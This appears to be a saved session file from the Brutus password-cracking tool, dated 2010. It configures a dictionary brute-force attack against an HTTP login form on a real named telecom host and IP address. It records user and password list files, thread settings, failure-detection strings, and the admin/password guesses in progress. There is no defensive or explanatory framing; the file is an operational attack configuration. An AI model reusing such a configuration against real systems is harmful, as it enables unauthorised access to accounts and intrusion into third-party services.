[Brutus Restore]
Date=2010-7-6
Time=120
TargetFull=gs.ct10000.com/lanzhou/person/
TargetIP=61.178.24.93
Target=gs.ct10000.com/lanzhou/person/
Targetstripped=gs.ct10000.com
TargetPort=80
PassMode=Word List
CurrentType=HTTP (Form)
ActiveThreads=10
ThreadCount=10
Attempts=4914
ActualAttempts=0
UserFile=users.txt
PassFile=words.txt
ComboDelimiter=:
UserCount=6
PassCount=819
PassIndex=10
UserIndex=1
Timeout=10
UseProxy=0
UseUserID=1
SingleUser=0
useHTTPKeepAlive=1
ProxySocksLevel=5
HTTPReferer=
HTTPUseCookies=1
HTTPCookieUpdate=1
ProxyUsername=
ProxyPassword=
ProxyAddress=127.0.0.1
ProxyPort=1080
ProxyUseAuth=0
ProxyType=
useBruteForce=0
bruteMinLength=0
bruteMaxLength=6
bruteRange=etaoinsrhldcumfpgwybvkxjqz
upperbrutechar=0
lowerbrutechar=0
CookieNames1=""
CookieValues1=""
CookieNames2=""
CookieValues2=""
CookieNames3=""
CookieValues3=""
CookieNames4=""
CookieValues4=""
fwauthStageStrings1=""
fwauthReadLength1=1
fwauthSendPostfix1=None
BruteWordArrayPos1=0
HTTPFormFields1=
HTTPFormFieldValues1=
fwauthStageStrings2=""
fwauthReadLength2=1
fwauthSendPostfix2=None
BruteWordArrayPos2=0
HTTPFormFields2=
HTTPFormFieldValues2=
fwauthStageStrings3=""
fwauthReadLength3=1
fwauthSendPostfix3=None
BruteWordArrayPos3=0
HTTPFormFields3=
HTTPFormFieldValues3=
fwauthStageStrings4=""
fwauthReadLength4=1
fwauthSendPostfix4=None
BruteWordArrayPos4=0
HTTPFormFields4=
HTTPFormFieldValues4=
fwauthStageStrings5=""
fwauthReadLength5=1
fwauthSendPostfix5=None
BruteWordArrayPos5=0
HTTPFormFields5=
HTTPFormFieldValues5=
fwauthStageStrings6=""
fwauthReadLength6=1
fwauthSendPostfix6=None
BruteWordArrayPos6=0
HTTPFormFields6=
HTTPFormFieldValues6=
fwauthStageStrings7=""
fwauthReadLength7=1
fwauthSendPostfix7=None
BruteWordArrayPos7=0
HTTPFormFields7=
HTTPFormFieldValues7=
fwauthStageStrings8=""
fwauthReadLength8=1
fwauthSendPostfix8=None
BruteWordArrayPos8=0
HTTPFormFields8=
HTTPFormFieldValues8=
fwauthStageStrings9=""
fwauthReadLength9=1
fwauthSendPostfix9=None
BruteWordArrayPos9=0
HTTPFormFields9=
HTTPFormFieldValues9=
fwauthStageStrings10=""
fwauthReadLength10=1
fwauthSendPostfix10=None
BruteWordArrayPos10=0
HTTPFormFields10=
HTTPFormFieldValues10=
fwauthStageStrings11=""
fwauthReadLength11=1
fwauthSendPostfix11=None
BruteWordArrayPos11=0
HTTPFormFields11=
HTTPFormFieldValues11=
fwauthStageStrings12=""
fwauthReadLength12=1
fwauthSendPostfix12=None
BruteWordArrayPos12=0
HTTPFormFields12=
HTTPFormFieldValues12=
fwauthStageStrings13=""
fwauthReadLength13=1
fwauthSendPostfix13=None
BruteWordArrayPos13=0
HTTPFormFields13=
HTTPFormFieldValues13=
fwauthStageStrings14="ncorrect"
fwauthReadLength14=1
fwauthSendPostfix14=None
BruteWordArrayPos14=0
HTTPFormFields14=
HTTPFormFieldValues14=
fwauthStageStrings15="nvalid"
fwauthReadLength15=1
fwauthSendPostfix15=None
BruteWordArrayPos15=0
HTTPFormFields15=
HTTPFormFieldValues15=
fwauthStageStrings16=""
fwauthReadLength16=1
fwauthSendPostfix16=None
BruteWordArrayPos16=0
HTTPFormFields16=
HTTPFormFieldValues16=
HTTPFormFieldUpdate=0
userprompt=
passprompt=
RespString=
HTTPRequestType=GET
posResponse=0
IsTelnet=0
IsHTTP=1
IsSMB=0
fwPrimaryResponseIsPositive=0
fwSecondaryResponseIsPositive=0
fwPrimaryResponseAction=13
fwSecondaryResponseAction=0
fwUserPrefix=""
fwUserPostfix=""
fwPassPrefix=""
fwPassPostfix=""
fwUsePreAuth=0
fwMaxAuthsConx=0
ThreadUsername1="admin"
ThreadPassword1=""
ThreadUsername2="admin"
ThreadPassword2="123"
ThreadUsername3="admin"
ThreadPassword3="aaa"
ThreadUsername4="admin"
ThreadPassword4="abc"
ThreadUsername5="admin"
ThreadPassword5="academia"
ThreadUsername6="admin"
ThreadPassword6="academic"
ThreadUsername7="admin"
ThreadPassword7="access"
ThreadUsername8="admin"
ThreadPassword8="ada"
ThreadUsername9="admin"
ThreadPassword9="admin"
ThreadUsername10="admin"
ThreadPassword10="administrator"
globUsername="admin"
globPassword="administrator"
